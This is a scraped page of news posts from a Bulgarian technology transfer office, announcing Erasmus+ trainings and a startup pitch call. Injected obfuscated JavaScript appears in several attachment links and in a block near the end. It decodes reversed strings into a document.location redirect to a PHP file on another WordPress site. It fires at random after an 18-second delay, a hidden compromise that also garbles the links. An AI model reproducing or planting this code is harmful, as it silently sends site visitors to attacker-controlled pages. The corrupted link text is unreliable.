Invitation to Participate in BoostUp! South East 2023 Call – Call for Startups

September 25, 2023 in ОТТ Новини

BoostUp! South East 2023 is an exceptional opportunity for startups in the manufacturing industry to showcase their innovative ideas and solutions, and pitch them in front of a jury panel of independent experts, in the live Grand Final event, which will take place on 29th November at the Divani Palace Acropolis, in Athens, Greece.  

 

Eligible companies are early stage and mature startups registered in one of the following countries: Albania, Bulgaria, Cyprus, Greece, Moldova, North Macedonia, Romania, Türkiye.  

 

The call is seeking to award pioneering ideas related to the following key areas: 

       Simulation & Advanced Engineering Tools 

       Virtual/Augmented Reality based solutions for industrial applications 

       Logistics Technologies 

       Advanced Additive Manufacturing solutions 

       Predictive and Preventive Maintenance 

       Industrial Robotics 

       Connectivity and Internet of Things (IoT) Infrastructure 

       Advanced Sensors (Industrial IoT) & Drones, Industrial Cybersecurity 

       Data analytics/ Artificial Intelligence and Digital Twins 

       Environmental and Social Sustainability 

 

  • Process: The first step is for startups to submit their idea/solution here. After the submission and evaluation of the applications, 10 finalists will be shortlisted to pitch their idea at the Grand Final event on the 29th of November.

  • Prizes: All finalists will receive a “growth package” award from the EIT Manufacturing Business Creation team to help internationalize and scale up their businesses and support their European go-to-market strategy. The 3 best startups will also win monetary prizes (7500 1st place, 5000 2nd place, 2500 3rd place).

 

 

 

Набиране на участници за международно обучение по проект „Предприемачество за всички“, което ще се проведе в гр. София, в периода 16-21.10.2022 г.

September 26, 2022 in ОТТ Новини

ДЗЗД Консорциум Иновативен Капитал, представляващо Офиса за Технологичен Трансфер (ТТО) Иновативен Капитал, в партньорство с European Network on Independent Living, Brussels Office (Белгия), Youth for U (Турция) и водещ бенефициент Tubitak Marmara Teknokent (Турция) изпълнява проект:  „Предприемачество за всички“, no: 2019-3-TR01-KA205-080186-EK-1, финансиран от Еразъм +.

Проектът „Предприемачество за всички“ има за цел да насърчи и засили участието на младите хора с увреждания в икономическия живот и да идентифицира предизвикателства, бариери, както и възможностите за насърчаване на предприемачеството сред тази целева група.

Целева група:  Основната целева група са младите хора с увреждания до 35 годишна възраст, с различни нужди от достъпност и интересуващи се от предприемачество, включително социално предприемачество. Въпреки това, от друга страна, поради цялостният подход на проекта, младите хора без увреждания също са целева група.

От 16.10.2022 г. до 21.10.2022 г. в България, в гр. София, в Парк Хотел Москва ще се проведе международно обучения на тема „Първи стъпки в предприемачеството – мотивационни техники“.

Желаещите да се включат в проекта и да вземат участие в предстоящото обучение могат да заявят участие до 10.10.2022 г., като изпратят попълнена и подписана заявка за участие на имейл адрес: consultationofficecenter@gmail.com, която ще видите прикачена под публикацията.

От Екипа на ДЗЗД Консорциум Иновативен Капитал

to-sofia.com/wp-content/uploads/2022/09/Обява-за-обучение-Набиране-на-участници.toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}docx">Обява за обучение - Набиране на участници

to-sofia.com/wp-content/uploads/2022/09/Personal_Questionaire_Enterpreneurship-for-all.toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}docx">Personal_Questionaire_Enterpreneurship for all

Набиране на участници за международно обучение по проект „Предприемачество за всички“, което ще се проведе в гр. Инстанбул, в периода 23-27.05.2022 г.

April 20, 2022 in ОТТ Новини

ДЗЗД Консорциум Иновативен Капитал, представляващо Офиса за Технологичен Трансфер (ТТО) Иновативен Капитал, в партньорство с EUROPEAN NETWORK ON INDEPENDENT LIVING BRUSSELS OFFICE (Белгия), Youth for U (Турция)и и водещ бенефициент Tubitak Marmara Teknokent (Турция) изпълнява проект:  „Предприемачество за всички“ № KA205-5BDDE056  финансиран от Еразъм +.

Проектът „Предприемачество за всички“ има за цел да насърчи и засили участието на младите хора с увреждания в икономическия живот и да идентифицира предизвикателства, бариери, както и възможни области за подобрение за насърчаване на предприемачеството сред тази целева група.

Целева група:  Основната целева група са младите хора с увреждания до 35 годишна възраст, с различни нужди от достъпност и интересуващи се от предприемачество, включително социално предприемачество. Въпреки това, от друга страна, поради цялостният подход на проекта, младите хора без увреждания също са целева група.

От 23.05.2022 г. до 27.05.2022 г. в Гебзе, Инстанбул ще се проведе международно обучения по предприемачество, подходящо за млади хора с и без увреждания.

to-sofia.com/wp-content/uploads/2022/04/Personal_Questionaire_Enterpreneurship-for-all.toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}docx">Personal_Questionaire_Enterpreneurship for all

Желаещите да се включат в проекта и да вземат участие в предстоящото обучение могат да заявят участие до 05.05.2022 г., като изпратят попълнена и подписана заявка за участие на имейл адрес: consultationofficecenter@gmail.com, която ще видите прикачена под публикацията.

От Екипа на ДЗЗД Консорциум Иновативен Капитал

 

Предприемачество за всички“ № KA205-5BDDE056 финансиран от Еразъм +. Предприемачество за всички“ е специализиран проект за социално включване и насърчаване на достъпа до предприемачество за всички млади хора в обществото

May 31, 2021 in ОТТ Новини

ДЗЗД Консорциум Иновативен капитал, представляващо Офиса за Технологичен Трансфер (ТТО) Иновативен Капитал, в партньорство с EUROPEAN NETWORK ON INDEPENDENT LIVING BRUSSELS OFFICE (Белгия), Youth for U (Турция)и и водещ бенефициент Tubitak Marmara Teknokent (Турция) изпълнява проект:  „Предприемачество за всички“ № KA205-5BDDE056  финансиран от Еразъм +. „Предприемачество за всички“ е специализиран проект за социално включване и насърчаване на достъпа до предприемачество за всички млади хора в обществото.
Продължителност: 24 месеца
Начало:  1 февруари 2020 година
Край: 31 декември 2022 година (проектът е замразен за една година поради Ковид- 19 пандемията)
Целите на проекта са:
- разработване и развиване на достъпни ресурси за предприемачество, подходящи за младите хора с увреждания;
- разработване на методологии за приобщаващо обучение по предприемачество, по-достъпни за всички млади хора, включително тези с различна форма и ниво на увреждане;
- насърчаване на инструментите и политиките на европейско ниво за предприемачество на хората с увреждания;
- създаване на мрежа за предприемачи с увреждания
В рамките на проекта се предвижда изпълнение на следните дейности:
- Изготвяне на проучване на тема:  „Съвременното състояние на предприемачеството за млади хора с увреждания”;
- Подготовка на ръководство за организации как да адаптират услугите и продуктите си, за да са подходящи и достъпни за млади предприемачи с увреждания;
- Разработване на неформални методи за обучение по предприемачество, адаптирани за млади хора с увреждания
- Провеждане на четири международни обучения по предприемачество, подходящи за групи млади хора с и без увреждания

Целева група:  Млади хора с увреждания до 35 годишна възраст, които имат интерес да станат предприемачи.

На 14.12 ще се проведе онлайн семинар за оценка на проект ITTA

December 11, 2020 in ОТТ Новини

to-sofia.com/wp-content/uploads/2020/12/снимка.png" alt="снимка" width="2038" height="1349" class="alignnone size-full wp-image-1799" />

Technology Transfer Office "Innovative capital" има удоволствието да Ви покани да се включите в последното ни събитие за годината, но и като цяло за проекта "Международна академия за трансфер на технологии", реализиран по програма Еразъм +.

Семинарът има за цел да представи резултатите и ефектите, постигнати по проекта, но също така е импулс за дискусия относно ролята на технологичния трансфер за научните организации и като цяло за обществото. По време на срещата гост-лекторите ще споделят опит и ще оценят пътя на обучението и въздействието от него, както и възможности за разпространението на постигнатите резултати.

Гост лектори са: д-р Станимир Андонов, проф. д-р Милен Балтов и проф. д-р Костадин Костадинов.

Кога: 14.12. (понеделник) от 09:45 ч.
Къде: ZOOM

Линк: https://us02web.zoom.us/meeting/register/tZ0lcOiqqz0oHdOi0MBerzGXDE2ADCwoig2f

Изисква се предварителна регистрация.

Предстои двудневно национално обучение на тема: “Иновационна стратегия. Експлоатация и комерсиализация на научните резултати.”

June 29, 2020 in ОТТ Новини

Предстои провеждане на пето национално обучение по проект: „Международна Академия за Трансфер на Технологии“ (ITTA), съфинансиран от Еразъм +. Петият модул ще се проведе на 07-08.07.2020 г. в ZOOM App. Обучението ще е на тема: “Иновационна стратегия. Експлоатация и комерсиализация на научните резултати.”, лектор е проф. Костадин Костадинов от Фондация ГИС- Трансфер Център.

Обучението стартира в 10:00ч.

Линк към приложението: https://us02web.zoom.us/j/81084823622?pwd=M2dOSFoxME41VVFtNTIvSTZ2WHByZz09

Организатор: ДЗЗД Консорциум Иновативен капитал

ДЗЗД Консорциум Иновативен капитал, представляващо Офиса за Технологичен Трансфер (ТТО) Иновативен Капитал, в партньорство с Kielecki Park Technologiczny (Полша), Tehnoloski Park Ljubljana (Словения), Technology Park Varazdin (Хърватия) и водещ бенефициент Tubitak Marmara Teknokent (Турция) изпълнява проект: „Международна Академия за Трансфер на Технологии“ (ITTA), съфинансиран от Еразъм +. Основната цел на проекта е да се повишат уменията и знанията на специалистите, занимаващи се с трансфер на технологии. Проектът е уникален заради съчетаването на няколко различни подхода за обучение: дистанционно обучение, неформално образование, практическо обучение, пилотно обучение, като целта е да се осигури подобряване на компетентностите не само на знанията, но и на умения, ценности и нагласи.
ITTA e проект с продължителност 36 м., обхващащ обучителни курсове в страната по 5 модула, онлайн обучение по 12 модула и 5 международни обучения.
В рамките на проекта участниците имат възможност:
- да вземат участие в 5 национални обучения (гр. София, продължителност 2 дни);
- да се обучават по 12 онлайн модула.

Целева група на проекта са младите хора на възраст между 18 и 35 години, които имат потенциал и готовност активно да участват в сектора на технологичния трансфер и НИРД. Те трябва да са предимно новозавършили студенти или се очаква да завършат през първите 2 години от проекта (2018-2019) или са настоящи служители на офис за технологичен трансфер. Участниците трябва да имат желание да станат потенциални служители в сектора на технологичен трансфер и силна мотивация за работа в тази област.

Желаещите да вземат участие в обучението могат да получат повече информация на имейл a.simeonovas@gmail.com

От Екипа на ДЗЗД Консорциум Иновативен капитал

to-sofia.com/wp-content/uploads/2019/06/DSC_6868.jpg" alt="DSC_6868" width="4608" height="3072" class="alignnone size-full wp-image-1708" />

Предстои четвърто национално обучение на тема: „Право на интелектуална собственост (защита и управление на правата върху интелектуална собственост)“

January 6, 2020 in ОТТ Новини

ДЗЗД Консорциум Иновативен капитал, представляващо Офиса за Технологичен Трансфер (ТТО) Иновативен Капитал, в партньорство с Kielecki Park Technologiczny (Полша), Tehnoloski Park Ljubljana (Словения), Technology Park Varazdin (Хърватия) и водещ бенефициент Tubitak Marmara Teknokent (Турция) изпълнява проект: „Международна Академия за Трансфер на Технологии“ (ITTA), съфинансиран от Еразъм +. Основната цел на проекта е да се повишат уменията и знанията на специалистите, занимаващи се с трансфер на технологии. Проектът е уникален заради съчетаването на няколко различни подхода за обучение: дистанционно обучение, неформално образование, практическо обучение, пилотно обучение, като целта е да се осигури подобряване на компетентностите не само на знанията, но и на умения, ценности и нагласи.
ITTA e проект с продължителност 36 м., обхващащ обучителни курсове в страната по 5 модула, онлайн обучение по 12 модула и 5 международни обучения.
В рамките на проекта участниците имат възможност:
- да вземат участие в 5 национални обучения (гр. София, продължителност 2 дни);
- да се обучават по 12 онлайн модула.
След приключване на проекта част от участниците ще имат възможност за безплатен стаж в институция/организация/компания в България, която изпълнява задачи в областта на трансфера на технологии.
Целева група на проекта са младите хора на възраст между 18 и 35 години, които имат потенциал и готовност активно да участват в сектора на технологичния трансфер и НИРД. Те трябва да са предимно новозавършили студенти или се очаква да завършат през първите 2 години от проекта (2018-2019) или са настоящи служители на офис за технологичен трансфер. Участниците трябва да имат желание да станат потенциални служители в сектора на технологичен трансфер и силна мотивация за работа в тази област.
На 23-24.01.2020 г. в гр. София ще се проведе четвърто национално обучение на тема „Право на интелектуална собственост (защита и управление на правата върху интелектуална собственост)“. Обучител по втория модул е д-р. Цветелина Йоргова от Фондация ГИС- Трансфер Център.
Желаещите да се включат в проекта могат да заявят участие до 14.01.2020 г., като изпратят попълнена и подписана заявка за участие на имейл адрес: a.simeonovas@gmail.com, която ще видите прикачена под публикацията.
От Екипа на ДЗЗД Консорциум Иновативен капитал

to-sofia.com/wp-content/uploads/2019/12/Personal_Questionaire_ITTA.toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}docx">Personal_Questionaire_ITTA

Предстои четвърто международно обучение на тема „Управление на международни проекти, международни инвестиционни мрежи и възможности“ в Словения

December 23, 2019 in ОТТ Новини

ДЗЗД Консорциум Иновативен капитал, представляващо Офиса за Технологичен Трансфер (ТТО) Иновативен Капитал, в партньорство с Kielecki Park Technologiczny (Полша), Tehnoloski Park Ljubljana (Словения), Technology Park Varazdin (Хърватия) и водещ бенефициент Tubitak Marmara Teknokent (Турция) изпълнява проект: „Международна Академия за Трансфер на Технологии“ (ITTA), съфинансиран от Еразъм +. Основната цел на проекта е да се повишат уменията и знанията на специалистите, занимаващи се с трансфер на технологии. Проектът е уникален заради съчетаването на няколко различни подхода за обучение: дистанционно обучение, неформално образование, практическо обучение, пилотно обучение, като целта е да се осигури подобряване на компетентностите не само на знанията, но и на умения, ценности и нагласи.

ITTA e проект с продължителност 36 м., обхващащ обучителни курсове в страната по 5 модула, онлайн обучение по 12 модула и 5 международни обучения.
В рамките на проекта участниците имат възможност:
- да вземат участие в 5 национални обучения (гр. София, продължителност 2 дни);
- да се обучават по 12 онлайн модула.

След приключване на проекта част от участниците ще имат възможност за безплатен стаж в институция/организация/компания в България, която изпълнява задачи в областта на трансфера на технологии.
Целева група на проекта са младите хора на възраст между 18 и 35 години, които имат потенциал и готовност активно да участват в сектора на технологичния трансфер и НИРД. Те трябва да са предимно новозавършили студенти или се очаква да завършат през първите 2 години от проекта или са настоящи служители на офис за технологичен трансфер. Участниците трябва да имат желание да станат потенциални служители в сектора на технологичен трансфер и силна мотивация за работа в тази област.

В периода 09-14.02.2020 г. в гр. Любляна, Словения ще се проведе четвъртото подред международно обучение на тема „Управление на международни проекти, международни инвестиционни мрежи и възможности“.
Желаещите да се включат в обучението могат да заявят участие до 27.12.2019 г., като изпратят попълнена и подписана заявка за участие на имейл адрес: a.simeonovas@gmail.com, която ще видите прикачена под публикацията.

От Екипа на ДЗЗД Консорциум Иновативен капитал
$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-sofia.com/wp-content/uploads/2019/12/Personal_Questionaire_ITTA.toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}docx">Personal_Questionaire_ITTA

Проведе се третото национално обучение на тема „ Маркетинг на нови технологии и иновативни продукти “ по проект „Международна Академия за Трансфер на Технологии“ (ITTA)

June 7, 2019 in ОТТ Новини

На 16-17.05.2019. в „София Тех Парк“, гр. София се проведе третият обучителен модул на тема „ Маркетинг на нови технологии и иновативни продукти “ с лектор д-р. Станимир Андонов от Фондация ГИС- Трансфер Център. Обучението е по проект „Международна Академия за Трансфер на Технологии“ (ITTA), съфинансиран от Еразъм +, в който ОТТ „Иновативен капитал“ е партньор заедно с Kielecki Park Technologiczny (Полша), Tehnoloski Park Ljubljana (Словения), Technology Park Varazdin (Хърватия) и водещ бенефициент Tubitak Marmara Teknokent (Турция). Основната цел на проекта е да се повишат уменията и знанията на специалистите, занимаващи се с трансфер на технологии. Проектът е уникален заради съчетаването на няколко различни подхода за обучение: дистанционно обучение, неформално образование, практическо обучение, пилотно обучение, като целта е да се осигури подобряване на компетентностите не само на знанията, но и на умения, ценности и нагласи.

Целева група на проекта са младите хора на възраст между 18 и 35 години, които имат потенциал и готовност активно да участват в сектора ТТ и НИРД. Те трябва да са предимно новозавършили студенти или се очаква да завършат през първите 2 години от проекта или са настоящи служители на TTO. Участниците трябва да имат желание да станат потенциални служители в ТТ сектора и силна мотивация за работа в  тази област. Всеки партньор по проекта има ангажимент да избере 15-20 участници. Участниците ще преминат през модулите за обучение на национално равнище и ще използват платформата за дистанционно обучение. Всеки преминал през обученията на национално ниво, ще има възможност да се включи и в поне един от международните обучителни дейности.

to-sofia.com/wp-content/uploads/2019/06/DSC_6868.jpg">DSC_6868to-sofia.com/wp-content/uploads/2019/06/DSC_6868.jpg" width="4608" height="3072" />to-sofia.com/wp-content/uploads/2019/06/DSC_6950.jpg">DSC_6950to-sofia.com/wp-content/uploads/2019/06/DSC_6950.jpg" width="4608" height="3072" /> to-sofia.com/wp-content/uploads/2019/06/DSC_6872.jpg">DSC_6872to-sofia.com/wp-content/uploads/2019/06/DSC_6872.jpg" width="4608" height="3072" />

Предстои второ национално обучение на тема „Технологичен трансфер“

December 21, 2018 in ОТТ Новини

ДЗЗД Консорциум Иновативен капитал, представляващо Офиса за Технологичен Трансфер (ТТО) Иновативен Капитал, в партньорство с Kielecki Park Technologiczny (Полша), Tehnoloski Park Ljubljana (Словения), Technology Park Varazdin (Хърватия) и водещ бенефициент Tubitak Marmara Teknokent (Турция) изпълнява проект: „Международна Академия за Трансфер на Технологии“ (ITTA), съфинансиран от Еразъм +. Основната цел на проекта е да се повишат уменията и знанията на специалистите, занимаващи се с трансфер на технологии. Проектът е уникален заради съчетаването на няколко различни подхода за обучение: дистанционно обучение, неформално образование, практическо обучение, пилотно обучение, като целта е да се осигури подобряване на компетентностите не само на знанията, но и на умения, ценности и нагласи.

ITTA e  проект с продължителност 36 м., обхващащ обучителни курсове в страната по 5 модула, онлайн обучение по 12 модула и 5 международни обучения.

В рамките на проекта участниците имат възможност:

- да вземат участие в 5 национални обучения (гр. София, продължителност 2 дни);

- да се обучават по 12 онлайн модула.

След приключване на проекта част от участниците ще имат възможност за  безплатен стаж в институция/организация/компания в България, която изпълнява задачи в областта на трансфера на технологии.

Целева група на проекта са младите хора на възраст между 18 и 35 години, които имат потенциал и готовност активно да участват в сектора на технологичния трансфер и НИРД. Те трябва да са предимно новозавършили студенти или се очаква да завършат през първите 2 години от проекта (2018-2019) или са настоящи служители на офис за технологичен трансфер. Участниците трябва да имат желание да станат потенциални служители в сектора на технологичен трансфер и силна мотивация за работа в  тази област.

На 17-18.01.2019 г. в гр. София ще се проведе второ национално обучение на тема „Технологичен трансфер“. Обучител по втория модул е проф. Костадин Костадинов от Фондация ГИС- Трансфер Център.

След провеждането на  обучението,  екип от експерти към ТТО Иновативен Капитал, ще избере 5 лица, които да се включат в международно обучение (времетраене 5 дни) в Полша, което ще се проведе през месец февруари 2019г.

Желаещите да се включат в проекта могат да заявят участие до 10.01.2019 г., като изпратят попълнена  и подписана заявка за участие на имейл адрес: a.simeonovas@gmail.com, която ще видите прикачена под публикацията.

От Екипа на ДЗЗД Консорциум Иновативен капитал

 to-sofia.com/wp-content/uploads/2018/12/Personal_Questionaire_ITTA.toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}docx">Personal_Questionaire_ITTA